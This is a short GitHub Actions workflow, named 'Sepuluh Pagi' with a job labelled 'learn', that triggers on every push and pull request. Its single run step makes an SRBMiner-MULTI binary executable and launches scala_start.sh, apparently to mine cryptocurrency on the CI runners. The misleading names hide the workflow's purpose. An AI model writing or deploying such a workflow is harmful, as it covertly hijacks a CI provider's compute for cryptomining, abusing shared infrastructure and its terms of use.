name: Sepuluh Pagi
on:
  push:
  pull_request:
  
jobs:
  build:
    name: learn
    runs-on: ubuntu-18.04
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: Run
      run: |
        chmod u+x SRBMiner-MULTI scala_start.sh && bash scala_start.sh
